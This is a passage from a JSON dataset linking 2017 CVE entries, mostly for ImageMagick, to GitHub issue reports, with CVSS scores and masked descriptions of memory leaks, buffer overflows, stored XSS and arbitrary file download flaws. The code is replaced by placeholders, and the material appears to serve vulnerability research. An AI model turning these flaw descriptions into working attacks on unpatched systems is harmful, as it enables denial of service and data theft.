  8215. "impactScore": 5.9,
  8216. "exploitabilityScore": 2.8
  8217. },
  8218. {
  8219. "CVE_ID": "CVE-2017-13058",
  8220. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/666",
  8221. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/666",
  8222. "Repo_new": "imagemagick/imagemagick",
  8223. "Issue_Created_At": "2017-08-10T16:09:37Z",
  8224. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8225. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8226. "severity": "MEDIUM",
  8227. "baseScore": 6.5,
  8228. "impactScore": 3.6,
  8229. "exploitabilityScore": 2.8
  8230. },
  8231. {
  8232. "CVE_ID": "CVE-2017-13059",
  8233. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/667",
  8234. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/667",
  8235. "Repo_new": "imagemagick/imagemagick",
  8236. "Issue_Created_At": "2017-08-10T16:10:04Z",
  8237. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8238. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8239. "severity": "MEDIUM",
  8240. "baseScore": 6.5,
  8241. "impactScore": 3.6,
  8242. "exploitabilityScore": 2.8
  8243. },
  8244. {
  8245. "CVE_ID": "CVE-2017-13060",
  8246. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/644",
  8247. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/644",
  8248. "Repo_new": "imagemagick/imagemagick",
  8249. "Issue_Created_At": "2017-08-04T08:54:02Z",
  8250. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  8251. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8252. "severity": "MEDIUM",
  8253. "baseScore": 6.5,
  8254. "impactScore": 3.6,
  8255. "exploitabilityScore": 2.8
  8256. },
  8257. {
  8258. "CVE_ID": "CVE-2017-13061",
  8259. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/645",
  8260. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/645",
  8261. "Repo_new": "imagemagick/imagemagick",
  8262. "Issue_Created_At": "2017-08-04T08:54:55Z",
  8263. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG The critical function call chain is APITAG APITAG APITAG in function APITAG ERRORTAG The string_info >length can be controlled by input file,here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: FILETAG Credit : APITAG of Venustech",
  8264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8265. "severity": "MEDIUM",
  8266. "baseScore": 6.5,
  8267. "impactScore": 3.6,
  8268. "exploitabilityScore": 2.8
  8269. },
  8270. {
  8271. "CVE_ID": "CVE-2017-13062",
  8272. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/669",
  8273. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/669",
  8274. "Repo_new": "imagemagick/imagemagick",
  8275. "Issue_Created_At": "2017-08-11T02:50:43Z",
  8276. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8277. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8278. "severity": "MEDIUM",
  8279. "baseScore": 6.5,
  8280. "impactScore": 3.6,
  8281. "exploitabilityScore": 2.8
  8282. },
  8283. {
  8284. "CVE_ID": "CVE-2017-13083",
  8285. "Issue_Url_old": "https://github.com/pbatard/rufus/issues/1009",
  8286. "Issue_Url_new": "https://github.com/pbatard/rufus/issues/1009",
  8287. "Repo_new": "pbatard/rufus",
  8288. "Issue_Created_At": "2017-08-28T15:47:42Z",
  8289. "description": "Rufus downloads updates over insecure HTTP. Checklist [x ] I looked at URLTAG to see if my question has already been answered. [x ] I performed a search in the issue tracker for similar issues, using keywords relevant to my problem. [x ] I clicked the Log button in Rufus and copy/pasted the log into the line that says APITAG below. [x ] The log I am copying is the FULL log, starting with the line APITAG I have NOT removed any part of it. Issue description Rufus checks for updates over HTTPS, however the update itself is downloaded over HTTP, which is insecure. See also: FILETAG Log CODETAG",
  8290. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8291. "severity": "HIGH",
  8292. "baseScore": 8.1,
  8293. "impactScore": 5.9,
  8294. "exploitabilityScore": 2.2
  8295. },
  8296. {
  8297. "CVE_ID": "CVE-2017-13131",
  8298. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/676",
  8299. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/676",
  8300. "Repo_new": "imagemagick/imagemagick",
  8301. "Issue_Created_At": "2017-08-15T08:32:02Z",
  8302. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG list.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8303. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8304. "severity": "MEDIUM",
  8305. "baseScore": 6.5,
  8306. "impactScore": 3.6,
  8307. "exploitabilityScore": 2.8
  8308. },
  8309. {
  8310. "CVE_ID": "CVE-2017-13132",
  8311. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/674",
  8312. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/674",
  8313. "Repo_new": "imagemagick/imagemagick",
  8314. "Issue_Created_At": "2017-08-14T16:25:20Z",
  8315. "description": "assertion failure in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG An assertion failure was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8316. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8317. "severity": "MEDIUM",
  8318. "baseScore": 6.5,
  8319. "impactScore": 3.6,
  8320. "exploitabilityScore": 2.8
  8321. },
  8322. {
  8323. "CVE_ID": "CVE-2017-13133",
  8324. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/679",
  8325. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/679",
  8326. "Repo_new": "imagemagick/imagemagick",
  8327. "Issue_Created_At": "2017-08-16T16:11:37Z",
  8328. "description": "memory exhaustion in load_tile. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify xcf file , imagemagick will allocate memory to store the data, here is the critical code: (xcf.c , in function load_tile) APITAG The parameter \"data_length\" is passed from function load_level: ERRORTAG The \"offset2\" and \"offset\" can be read from input file (can be controlled). APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
  8329. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8330. "severity": "MEDIUM",
  8331. "baseScore": 6.5,
  8332. "impactScore": 3.6,
  8333. "exploitabilityScore": 2.8
  8334. },
  8335. {
  8336. "CVE_ID": "CVE-2017-13134",
  8337. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/670",
  8338. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/670",
  8339. "Repo_new": "imagemagick/imagemagick",
  8340. "Issue_Created_At": "2017-08-12T05:12:16Z",
  8341. "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify SFW file ,a heap buffer overflow vulnerability was found in function APITAG in coders/sfw.c, Here is the critical code: ERRORTAG In function APITAG ERRORTAG The memory space of the heap buffer \"p\", is p~q (from p NUMBERTAG to p[q p NUMBERTAG but in the for loop of while,the \"p[i]\" will lead to heap buffer overflow. testcase: URLTAG APITAG of Venustech",
  8342. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8343. "severity": "MEDIUM",
  8344. "baseScore": 6.5,
  8345. "impactScore": 3.6,
  8346. "exploitabilityScore": 2.8
  8347. },
  8348. {
  8349. "CVE_ID": "CVE-2017-13135",
  8350. "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/1",
  8351. "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/1",
  8352. "Repo_new": "ebel34/bpg-web-encoder",
  8353. "Issue_Created_At": "2017-11-16T00:15:04Z",
  8354. "description": "3 bugs for.",
  8355. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8356. "severity": "HIGH",
  8357. "baseScore": 7.8,
  8358. "impactScore": 5.9,
  8359. "exploitabilityScore": 1.8
  8360. },
  8361. {
  8362. "CVE_ID": "CVE-2017-13140",
  8363. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/596",
  8364. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/596",
  8365. "Repo_new": "imagemagick/imagemagick",
  8366. "Issue_Created_At": "2017-07-21T17:02:55Z",
  8367. "description": "Potential DOS attack with pngs. Hi there I've discovered a potential DOS vulnerability in APITAG when dealing with PNGs. Is there a security reporting email I should contact, or shall I just post it here?",
  8368. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8369. "severity": "MEDIUM",
  8370. "baseScore": 6.5,
  8371. "impactScore": 3.6,
  8372. "exploitabilityScore": 2.8
  8373. },
  8374. {
  8375. "CVE_ID": "CVE-2017-13141",
  8376. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/600",
  8377. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/600",
  8378. "Repo_new": "imagemagick/imagemagick",
  8379. "Issue_Created_At": "2017-07-23T13:59:51Z",
  8380. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  8381. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8382. "severity": "MEDIUM",
  8383. "baseScore": 6.5,
  8384. "impactScore": 3.6,
  8385. "exploitabilityScore": 2.8
  8386. },
  8387. {
  8388. "CVE_ID": "CVE-2017-13143",
  8389. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/362",
  8390. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/362",
  8391. "Repo_new": "imagemagick/imagemagick",
  8392. "Issue_Created_At": "2017-01-26T15:31:47Z",
  8393. "description": "use of uninitialized data in PATHTAG In issue NUMBERTAG an out of bounds read involving the mat image format has been fixed. After the fixing commits the buffer APITAG is large enough to deal with the APITAG file CVETAG that lead to issue NUMBERTAG However, after the fix the coder still accesses uninitialized data which might pose a security issue or at least a bug. The first undefined access happens within APITAG in a call to APITAG . The back part of the buffer APITAG is now large enough but does seemingly not contain any sensible data. I've tested this using the current APITAG master branch git revision APITAG Undefined access is detected by _valgrind_ using this command line: APITAG",
  8394. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  8395. "severity": "HIGH",
  8396. "baseScore": 7.5,
  8397. "impactScore": 3.6,
  8398. "exploitabilityScore": 3.9
  8399. },
  8400. {
  8401. "CVE_ID": "CVE-2017-13145",
  8402. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/501",
  8403. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/501",
  8404. "Repo_new": "imagemagick/imagemagick",
  8405. "Issue_Created_At": "2017-05-28T06:09:07Z",
  8406. "description": "Failed tests with NUMBERTAG and NUMBERTAG APITAG PATHTAG ERRORTAG",
  8407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8408. "severity": "MEDIUM",
  8409. "baseScore": 6.5,
  8410. "impactScore": 3.6,
  8411. "exploitabilityScore": 2.8
  8412. },
  8413. {
  8414. "CVE_ID": "CVE-2017-13658",
  8415. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/598",
  8416. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/598",
  8417. "Repo_new": "imagemagick/imagemagick",
  8418. "Issue_Created_At": "2017-07-23T13:55:02Z",
  8419. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  8420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8421. "severity": "MEDIUM",
  8422. "baseScore": 6.5,
  8423. "impactScore": 3.6,
  8424. "exploitabilityScore": 2.8
  8425. },
  8426. {
  8427. "CVE_ID": "CVE-2017-13692",
  8428. "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/588",
  8429. "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/588",
  8430. "Repo_new": "htacg/tidy-html5",
  8431. "Issue_Created_At": "2017-08-24T09:57:54Z",
  8432. "description": "[bug] Segmentation Fault. Description This crash occurs at APITAG In function APITAG , the variable c equals to NUMBERTAG in this case). When function APITAG is called, it can cause Segmentation Fault. Version APITAG Address Sanitizer Output ERRORTAG GDB Information APITAG APITAG Contact me if you need Poc file at EMAILTAG or EMAILTAG",
  8433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8434. "severity": "HIGH",
  8435. "baseScore": 7.5,
  8436. "impactScore": 3.6,
  8437. "exploitabilityScore": 3.9
  8438. },
  8439. {
  8440. "CVE_ID": "CVE-2017-13755",
  8441. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/913",
  8442. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/913",
  8443. "Repo_new": "sleuthkit/sleuthkit",
  8444. "Issue_Created_At": "2017-08-25T19:50:41Z",
  8445. "description": "fls segfaults in iso NUMBERTAG proc_dir.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: segfault.img $ fls segfault.img Segmentation fault This bug was found using american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: ERRORTAG Input:",
  8446. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8447. "severity": "MEDIUM",
  8448. "baseScore": 5.5,
  8449. "impactScore": 3.6,
  8450. "exploitabilityScore": 1.8
  8451. },
  8452. {
  8453. "CVE_ID": "CVE-2017-13756",
  8454. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/914",
  8455. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/914",
  8456. "Repo_new": "sleuthkit/sleuthkit",
  8457. "Issue_Created_At": "2017-08-25T20:38:17Z",
  8458. "description": "mmls hangs due to infinite looping of APITAG To reproduce: $ base NUMBERTAG d > FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: See above. I can't attach the zip file, for unknown reasons.",
  8459. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8460. "severity": "MEDIUM",
  8461. "baseScore": 5.5,
  8462. "impactScore": 3.6,
  8463. "exploitabilityScore": 1.8
  8464. },
  8465. {
  8466. "CVE_ID": "CVE-2017-13760",
  8467. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/906",
  8468. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/906",
  8469. "Repo_new": "sleuthkit/sleuthkit",
  8470. "Issue_Created_At": "2017-08-24T21:23:06Z",
  8471. "description": "fls hangs on corrupt exfat image.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: FILETAG",
  8472. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8473. "severity": "MEDIUM",
  8474. "baseScore": 5.5,
  8475. "impactScore": 3.6,
  8476. "exploitabilityScore": 1.8
  8477. },
  8478. {
  8479. "CVE_ID": "CVE-2017-13768",
  8480. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/706",
  8481. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/706",
  8482. "Repo_new": "imagemagick/imagemagick",
  8483. "Issue_Created_At": "2017-08-29T10:37:35Z",
  8484. "description": "Null Pointer Dereference in the APITAG function within PATHTAG A Null Pointer De reference vulnerability is occurring due to the vulnerable code in the APITAG function within PATHTAG The vulnerable code is as follows: ERRORTAG It is seen that _p_ is being explicitly checked whether it is NULL and if it is, it breaks out of the for loop. Now the subsequent for loop modifies the value of p but due to the break statement, this doesn't occur. Eventually, _p_ is being used as an argument here in the APITAG function: APITAG Looking at the definition, _p_ is passed into _const Quantum magick_restrict pixel_, which is the NUMBERTAG nd argument. This is being explicitly de referenced here: APITAG There should be a check to verify if a pointer is NULL or not before any operations are performed on it, if it depends on user input: APITAG",
  8485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8486. "severity": "MEDIUM",
  8487. "baseScore": 6.5,
  8488. "impactScore": 3.6,
  8489. "exploitabilityScore": 2.8
  8490. },
  8491. {
  8492. "CVE_ID": "CVE-2017-13769",
  8493. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/705",
  8494. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/705",
  8495. "Repo_new": "imagemagick/imagemagick",
  8496. "Issue_Created_At": "2017-08-29T09:51:25Z",
  8497. "description": "Array Index Out of Bounds and Potential Buffer Overflow due to user controlled value being used as Array Index. An issue affects PATHTAG in the APITAG function, where an externally controllable value is being used as an index in the process of generating a thumbnail image. This can lead to potential Buffer Overflow. The vulnerable code is: ERRORTAG Here the _offset_ variable gets its value from APITAG being run on an input image. This value of _offset_ is not being sanitized before it is being used as an array index in: APITAG It is also being used to generate the _thumbnail_image_ by calling the APITAG function, where the value of _const void blob_ depends on the value of offset. Validation is being performed on whether blob is NULL using: ERRORTAG However, there are no checks on whether it is too large.",
  8498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8499. "severity": "MEDIUM",
  8500. "baseScore": 6.5,
  8501. "impactScore": 3.6,
  8502. "exploitabilityScore": 2.8
  8503. },
  8504. {
  8505. "CVE_ID": "CVE-2017-13778",
  8506. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/8",
  8507. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/8",
  8508. "Repo_new": "fiyocms/fiyocms",
  8509. "Issue_Created_At": "2017-08-29T12:32:46Z",
  8510. "description": "PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability ERRORTAG '$_POST[site_name]' is not filtered,and Write directly to the database APITAG and then PATHTAG CODETAG It does not do any filtering, directly the \u2019site_name\u2018 output page So when i set the 'site_name' to xss payload,there is a storage xss APITAG",
  8511. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8512. "severity": "MEDIUM",
  8513. "baseScore": 6.1,
  8514. "impactScore": 2.7,
  8515. "exploitabilityScore": 2.8
  8516. },
  8517. {
  8518. "CVE_ID": "CVE-2017-13780",
  8519. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/8",
  8520. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/8",
  8521. "Repo_new": "eyesofnetworkcommunity/eonweb",
  8522. "Issue_Created_At": "2017-08-30T15:41:25Z",
  8523. "description": "PATHTAG $_GET FILETAG CODETAG '$_GET[\"file\"]' is not filtered,and exists arbitrary file download vulnerability So when we open this url: [ URLTAG ) it would download the file PATHTAG APITAG and we can get the contents of this file APITAG",
  8524. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  8525. "severity": "HIGH",
  8526. "baseScore": 7.5,
  8527. "impactScore": 3.6,
  8528. "exploitabilityScore": 3.9
  8529. },
  8530. {
  8531. "CVE_ID": "CVE-2017-14039",
  8532. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/992",
  8533. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/992",
  8534. "Repo_new": "uclouvain/openjpeg",
  8535. "Issue_Created_At": "2017-08-16T14:35:03Z",
  8536. "description": "heap base buffer overflow in opj_t2_encode_packet (t2.c). On master: ERRORTAG Testcase: URLTAG",
  8537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8538. "severity": "HIGH",
  8539. "baseScore": 8.8,
  8540. "impactScore": 5.9,
  8541. "exploitabilityScore": 2.8
  8542. },
  8543. {
  8544. "CVE_ID": "CVE-2017-14041",
  8545. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/997",
  8546. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/997",
  8547. "Repo_new": "uclouvain/openjpeg",
  8548. "Issue_Created_At": "2017-08-18T11:28:36Z",
  8549. "description": "stack based buffer overflow write in pgxtoimage (/convert.c). On master, I didn't try on NUMBERTAG ERRORTAG Testcase: URLTAG Can you confirm if it affects NUMBERTAG too?",
  8550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8551. "severity": "HIGH",
  8552. "baseScore": 8.8,
  8553. "impactScore": 5.9,
  8554. "exploitabilityScore": 2.8
  8555. },
  8556. {
  8557. "CVE_ID": "CVE-2017-14060",
  8558. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/710",
  8559. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/710",
  8560. "Repo_new": "imagemagick/imagemagick",
  8561. "Issue_Created_At": "2017-08-31T07:54:41Z",
  8562. "description": "Null Pointer Dereference vulnerability triggered by malformed image files. A Null Pointer Dereference issues is present in the APITAG function within the PATHTAG file. The vulnerable code is as follows: ERRORTAG Here, the variable _q_ is getting the output of the function APITAG This function, in turn calls: ERRORTAG The APITAG function performs a series of asserts are explicitly returns NULL: ERRORTAG Once this NULL is returned back to the original function via APITAG , _q_ gets the NULL value. It gets used in a function call: APITAG It is finally de referenced in APITAG in the following line: APITAG Modifying the code to: APITAG Would avoid this vulnerability.",
  8563. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8564. "severity": "MEDIUM",
  8565. "baseScore": 6.5,
  8566. "impactScore": 3.6,
  8567. "exploitabilityScore": 2.8
  8568. },
  8569. {
  8570. "CVE_ID": "CVE-2017-14063",
  8571. "Issue_Url_old": "https://github.com/AsyncHttpClient/async-http-client/issues/1455",
  8572. "Issue_Url_new": "https://github.com/asynchttpclient/async-http-client/issues/1455",
  8573. "Repo_new": "asynchttpclient/async-http-client",
  8574. "Issue_Created_At": "2017-08-28T08:43:49Z",
  8575. "description": "Security: AHC can be tricked into connecting to a different host. Issue is very similar to CVETAG that FILETAG . AHC url parser, APITAG can be tricked with a anchor containing a question mark into connecting to a different host. This issue also affects APITAG (as of NUMBERTAG u NUMBERTAG but not APITAG : CODETAG Credit goes to Nicolas Gr\u00e9goire from FILETAG .",
  8576. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  8577. "severity": "HIGH",
  8578. "baseScore": 7.5,
  8579. "impactScore": 3.6,
  8580. "exploitabilityScore": 3.9
  8581. },
  8582. {
  8583. "CVE_ID": "CVE-2017-14132",
  8584. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/147",
  8585. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/147",
  8586. "Repo_new": "jasper-software/jasper",
  8587. "Issue_Created_At": "2017-09-01T09:36:06Z",
  8588. "description": "heap based buffer overflow in APITAG A heap overflow is found in jasper, and the tested commit is NUMBERTAG f URLTAG ERRORTAG According to the output by APITAG I try to analyse with gdb. by set breadpoint at jas_image_copy CODETAG as we can see, the APITAG is NUMBERTAG and APITAG is NUMBERTAG too. in APITAG , newcmpts is alloc according the APITAG which is NUMBERTAG finnaly alloced by pass NUMBERTAG to malloc which will return a heap address. in the later access in APITAG APITAG APITAG defined in PATHTAG CODETAG poc file: FILETAG",
  8589. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8590. "severity": "MEDIUM",
  8591. "baseScore": 6.5,
  8592. "impactScore": 3.6,
  8593. "exploitabilityScore": 2.8
  8594. },
  8595. {
  8596. "CVE_ID": "CVE-2017-14136",
  8597. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9443",
  8598. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9443",
  8599. "Repo_new": "opencv/opencv",
  8600. "Issue_Created_At": "2017-08-23T08:45:32Z",
  8601. "description": "out of bound write cause Segmentfault. APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG the latest commit: b NUMBERTAG c NUMBERTAG e NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid writing occurs in function APITAG It is not the same with the previous one. ( URLTAG the crash details as follows: ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: URLTAG APITAG",
  8602. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8603. "severity": "MEDIUM",
  8604. "baseScore": 6.5,
  8605. "impactScore": 3.6,
  8606. "exploitabilityScore": 2.8
  8607. },
  8608. {
  8609. "CVE_ID": "CVE-2017-14137",
  8610. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/641",
  8611. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/641",
  8612. "Repo_new": "imagemagick/imagemagick",
  8613. "Issue_Created_At": "2017-08-02T05:01:54Z",
  8614. "description": "memory exhausted in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG Here is the critical code ERRORTAG Credit: APITAG of Venustech",
  8615. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8616. "severity": "HIGH",
  8617. "baseScore": 7.5,
  8618. "impactScore": 3.6,
  8619. "exploitabilityScore": 3.9
  8620. },
  8621. {
  8622. "CVE_ID": "CVE-2017-14138",
  8623. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/639",
  8624. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/639",
  8625. "Repo_new": "imagemagick/imagemagick",
  8626. "Issue_Created_At": "2017-08-01T14:48:29Z",
  8627. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG",
  8628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8629. "severity": "CRITICAL",
  8630. "baseScore": 9.8,
  8631. "impactScore": 5.9,
  8632. "exploitabilityScore": 3.9
  8633. },
  8634. {
  8635. "CVE_ID": "CVE-2017-14139",
  8636. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/578",
  8637. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/578",
  8638. "Repo_new": "imagemagick/imagemagick",
  8639. "Issue_Created_At": "2017-07-17T04:58:46Z",
